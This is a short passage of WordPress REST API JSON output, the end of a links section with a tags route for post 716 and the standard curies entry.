.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=716"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}